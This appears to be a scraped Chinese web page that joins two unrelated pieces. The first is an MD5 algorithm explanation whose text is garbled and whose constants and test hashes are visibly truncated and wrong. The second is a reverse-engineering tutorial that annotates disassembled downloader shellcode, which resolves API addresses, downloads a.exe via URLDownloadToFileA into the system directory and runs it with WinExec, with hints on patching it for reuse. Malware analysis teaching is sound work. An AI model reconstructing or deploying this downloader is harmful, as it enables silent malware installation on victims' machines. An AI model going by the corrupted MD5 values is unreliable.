ff(d,a,b,c,m1,,0xe8c7b)
ff(c,d,a,b,m2,,0xdb)
ff(b,c,d,a,m3,,0xc1bdceee)
ff(a,b,c,d,m4,7,0xfc0faf)
ff(d,a,b,c,m5,,0xca)
ff(c,d,a,b,m6,,0xa)
ff(b,c,d,a,m7,,0xfd)
ff(a,b,c,d,m8,7,0xd8)
ff(d,a,b,c,m9,,0x8bf7af)
ff(c,d,a,b,m,,0xffff5bb1)
ff(b,c,d,a,m,,0xcd7be)
ff(a,b,c,d,m,7,0x6b)
ff(d,a,b,c,m,,0xfd)
ff(c,d,a,b,m,,0xae)
ff(b,c,d,a,m,,0xb)
第äºè½®
gg(a,b,c,d,m1,5,0xfe)
gg(d,a,b,c,m6,9,0xcb)
gg(c,d,a,b,m,,0xe5a)
gg(b,c,d,a,m0,,0xe9b6c7aa)
gg(a,b,c,d,m5,5,0xdfd)
gg(d,a,b,c,m,9,0x)
gg(c,d,a,b,m,,0xd8a1e)
gg(b,c,d,a,m4,,0xe7d3fbc8)
gg(a,b,c,d,m9,5,0xe1cde6)
gg(d,a,b,c,m,9,0xcd6)
gg(c,d,a,b,m3,,0xf4dd)
gg(b,c,d,a,m8,,0xaed)
gg(a,b,c,d,m,5,0xa9e3e)
gg(d,a,b,c,m2,9,0xfcefa3f8)
gg(c,d,a,b,m7,,0xfd9)
gg(b,c,d,a,m,,0x8d2a4c8a)
第ä¸è½®
hh(a,b,c,d,m5,4,0xfffa)
hh(d,a,b,c,m8,,0xf)
hh(c,d,a,b,m,,0x6d9d)
hh(b,c,d,a,m,,0xfdec)
hh(a,b,c,d,m1,4,0xa4beea)
hh(d,a,b,c,m4,,0x4bdecfa9)
hh(c,d,a,b,m7,,0xf6bb4b)
hh(b,c,d,a,m,,0xbebfbc)
hh(a,b,c,d,m,4,0xb7ec6)
hh(d,a,b,c,m0,,0xeaafa)
hh(c,d,a,b,m3,,0xd4ef)
hh(b,c,d,a,m6,,0xd)
hh(a,b,c,d,m9,4,0xd9d4d)
hh(d,a,b,c,m,,0xe6dbe5)
hh(c,d,a,b,m,,0x1facf8)
hh(b,c,d,a,m2,,0xc4ac)
第åè½®
ii(a,b,c,d,m0,6,0xf)
ii(d,a,b,c,m7,,0xaff)
ii(c,d,a,b,m,,0xaba7)
ii(b,c,d,a,m5,,0xfca)
ii(a,b,c,d,m,6,0xbc3)
ii(d,a,b,c,m3,,0x8f0ccc)
ii(c,d,a,b,m,,0xffeffd)
ii(b,c,d,a,m1,,0xdd1)
ii(a,b,c,d,m8,6,0x6fae4f)
ii(d,a,b,c,m,,0xfe2ce6e0)
ii(c,d,a,b,m6,,0xa)
ii(b,c,d,a,m,,0x4ea1)
ii(a,b,c,d,m4,6,0xfe)
ii(d,a,b,c,m,,0xbd3af)
ii(c,d,a,b,m2,,0x2ad7d2bb)
ii(b,c,d,a,m9,,0xebd)
常æ°tiå¯ä»¥å¦ä¸éæ©ï¼
å¨ç¬¬iæ¥ä¸ï¼tiæ¯*abs(sin(i))çæ´æ°é¨åï¼içåä½æ¯å¼§åº¦ã(çäº2ç次æ¹)
ææè¿äºå®æä¹åï¼å°aãbãcãdåå«å ä¸aãbãcãdãç¶åç¨ä¸ä¸åç»æ°æ®ç»§ç»è¿è¡ç®æ³ï¼æåçè¾åºæ¯aãbãcådç级èã
å½ä½ æç §æä¸é¢æ说çæ¹æ³å®ç°md5ç®æ³ä»¥åï¼ä½ å¯ä»¥ç¨ä»¥ä¸å 个信æ¯å¯¹ä½ ååºæ¥çç¨åºä½ä¸ä¸ªç®åçæµè¯ï¼ççç¨åºæ没æé误ã
md5 ("") = dd8cdfbeecfe
md5 ("a") = 0ccb9c0f1b6ace
md5 ("abc") = cdfb0df7def
md5 ("message digest") = fbd7cbda2faafd0
md5 ("abcdefghijklmnopqrstuvwxyz") = c3fcd3dedfbccaeb
md5 ("abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz") =
dabdd9f5ac2c9fd9f
md5 ("
") = edf4abe3cacda2eba
å¦æä½ ç¨ä¸é¢çä¿¡æ¯åå«å¯¹ä½ åçmd5ç®æ³å®ä¾åæµè¯ï¼æåå¾åºçç»è®ºåæ åçæ¡å®å ¨ä¸æ ·ï¼é£æå°±è¦å¨è¿éè±¡ä½ éä¸å£°ç¥è´ºäºãè¦ç¥éï¼æçç¨åºå¨ç¬¬ä¸æ¬¡ç¼è¯æåçæ¶åæ¯æ²¡æå¾åºåä¸é¢ç¸åçç»æçã
md5çå®å ¨æ§
md5ç¸å¯¹md4æä½çæ¹è¿ï¼
1. å¢å äºç¬¬åè½®ï¼
2. æ¯ä¸æ¥åæå¯ä¸çå æ³å¸¸æ°ï¼
3. 为å弱第äºè½®ä¸å½æ°gç对称æ§ä»(x&y)|(x&z)|(y&z)å为(x&z)|(y&(~z))ï¼
4. 第ä¸æ¥å ä¸äºä¸ä¸æ¥çç»æï¼è¿å°å¼èµ·æ´å¿«çéªå´©æåºï¼
5. æ¹åäºç¬¬äºè½®å第ä¸è½®ä¸è®¿é®æ¶æ¯ååç»ç次åºï¼ä½¿å ¶æ´ä¸ç¸ä¼¼ï¼
6. è¿ä¼¼ä¼åäºæ¯ä¸è½®ä¸ç循ç¯å·¦ç§»ä½ç§»é以å®ç°æ´å¿«çéªå´©æåºãåè½®çä½ç§»éäºä¸ç¸åã
[color=red]ç®åç说ï¼
MD5å«ä¿¡æ¯ï¼æè¦ç®æ³ï¼æ¯ä¸ç§å¯ç çç®æ³ï¼å®å¯ä»¥å¯¹ä»»ä½æ件产çä¸ä¸ªå¯ä¸çMD5éªè¯ç ï¼æ¯ä¸ªæ件çMD5ç å°±å¦åæ¯ä¸ªäººçæ纹ä¸æ ·ï¼é½æ¯ä¸åçï¼è¿æ ·ï¼ä¸æ¦è¿ä¸ªæ件å¨ä¼ è¾è¿ç¨ä¸ï¼å ¶å 容被æåæè 被修æ¹çè¯ï¼é£ä¹è¿ä¸ªæ件çMD5ç å°±ä¼åçååï¼éè¿å¯¹æ件MD5çéªè¯ï¼å¯ä»¥å¾ç¥è·å¾çæ件æ¯å¦å®æ´ã
十六进制编码的c语言是怎样的
文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。
OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。
在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。
2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。
拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。
将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:
4AD 5A pop edx ; 函数返回的地址保存到edx中
4AD :A1 mov eax, dword ptr fs:[] ; 取peb
4AD 8B 0C mov eax, dword ptr [eax+C] ; peb_link
4ADB 8B 1C mov esi, dword ptr [eax+1C] ; 初始化列表到esi
4ADE AD lods dword ptr [esi] ; [esi]->eax + 8的位置即kernel.dll的地址
4ADF 8B mov eax, dword ptr [eax+8] ; eax=kernel.dll的地址
4AD 8BD8 mov ebx, eax ; ebx=kernel.dll的基址
4AD 8B 3C mov esi, dword ptr [ebx+3C] ; esi = pe头偏移
4AD 8BE mov esi, dword ptr [esi+ebx+] ; esi为kernel.dll导出表的偏移
4ADB F3 add esi, ebx ; esi = kernel.dll导出表的虚拟地址
4ADD 8B7E mov edi, dword ptr [esi+] ; edi=ent的偏移地址
4AD FB add edi, ebx ; edi = ent的虚拟地址
4AD 8B4E mov ecx, dword ptr [esi+] ; ecx = kernel.dll导出地址的个数
4AD ED xor ebp, ebp ; ebp=0
4AD push esi ; 保存导出表虚拟地址
4AD push edi ; 保存ent虚拟地址
4AD push ecx ; 保存计数
4ADA 8B3F mov edi, dword ptr [edi]
4ADC FB add edi, ebx ; 定位ent中的函数名
4ADE 8BF2 mov esi, edx ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据
4AD 6A 0E push 0E ; 0xe0是GetProcAddress函数的字符个数
4AD pop ecx ; 设置循环次数为 0xe
4AD F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi] ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress
4AD je short 4ADF ; 如果ENT中的函数名为GetProcAddress跳走
4AD pop ecx ; 不相等则将导出地址数出栈
4AD 5F pop edi ; ent虚拟地址出栈
4AD C7 add edi, 4 ; edi地址递增4字节 因为ENT的元素大小为4字节
4ADC inc ebp ; ebp用于保存ent中定位到GetProcAddress函数时的计数
4ADD ^ E2 E9 loopd short 4AD ; 循环查询
4ADF pop ecx
4AD 5F pop edi
4AD 5E pop esi
4AD 8BCD mov ecx, ebp ; 计数保存于ecx
4AD 8B mov eax, dword ptr [esi+] ; esi+0x Ordinal序号表偏移地址
4AD C3 add eax, ebx ; ordinal序号表的虚拟地址
4AD D1E1 shl ecx, 1 ; ecx逻辑增加2倍 因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍
4ADB C1 add eax, ecx
4ADD C9 xor ecx, ecx ; ecx=0
4ADF :8B mov cx, word ptr [eax] ; 保存取出的ordinal序号
4AD 8B 1C mov eax, dword ptr [esi+1C] ; eax 为kenrnel.dll的EAT的偏移地址
4AD > C3 add eax, ebx ; eax = kernel.dll的eat虚拟地址
4AD C1E1 shl ecx, 2 ; 同上,扩大4倍因为eat中元素为DWORD值
4ADA C1 add eax, ecx
4ADC 8B mov eax, dword ptr [eax] ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA
4ADE C3 add eax, ebx ; 与基址相加求得GetProcAddress函数的虚拟地址
4AD 8BFA mov edi, edx ; GetProcAddress字符到edi
4AD 8BF7 mov esi, edi ; esi保存GetProcAddress地址
4AD C6 0E add esi, 0E ; esi指向GetProcAddress字符串的末地址
4AD 8BD0 mov edx, eax ; edx为GetProcAddress的地址
4AD 6A push 4
4ADB pop ecx ; ecx=4
有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:
4ADC E8 call 4ADE1 ; 设置IAT 得到4个函数的地址
4AD C6 0D add esi, 0D ; 从这里开始实现ShellCode的真正功能
4AD push edx
4AD push esi ; urlmon
4AD FF FC call dword ptr [edi-4] ; 调用LoadLibrarA来加载urlmon.dll
4AD 5A pop edx ; edx = GetProcAddress的地址
4ADA 8BD8 mov ebx, eax
4ADC 6A push 1
4ADE pop ecx
4ADF E8 3D call 4ADE1 ; 再次设置 IAT 得到URLDownLoadToFileA
4ADA4 C6 add esi, ; esi指向URLDownLoadToFileA的末地址
4ADA7 push esi
4ADA8 inc esi
4ADA9 E cmp byte ptr [esi], ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束
4ADAC ^ FA jnz short 4ADA8 ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x
4ADAE xor byte ptr [esi],
4ADB1 5E pop esi
4ADB2 EC sub esp, ; 开辟 byte栈空间
4ADB5 > 8BDC mov ebx, esp ; ebx为栈区的指针
4ADB7 6A push
4ADB9 push ebx
4ADBA FF EC call dword ptr [edi-] ; 调用GetSystemDirectoryA得到系统目录
4ADBD C 5CE mov dword ptr [ebx+eax], EC ; ebx+0x 系统路径占 0x个字节
4ADC4 C mov dword ptr [ebx+eax+4], ; 拼接下载后的文件路径%systemroot%\system\a.exe
4ADCC C0 xor eax, eax
4ADCE push eax
4ADCF push eax
4ADD0 push ebx
4ADD1 push esi
4ADD2 push eax
4ADD3 > FF FC call dword ptr [edi-4] ; URLDownLoadToFile下载文件为a.exe
4ADD6 8BDC mov ebx, esp
4ADD8 push eax
4ADD9 push ebx
4ADDA FF F0 call dword ptr [edi-] ; WinExec执行代码
4ADDD push eax
4ADDE FF F4 call dword ptr [edi-C] ; ExitThread退出线程
接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。
使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:
通过这个实例 ,相信应该能理解一个大致的流程啦。
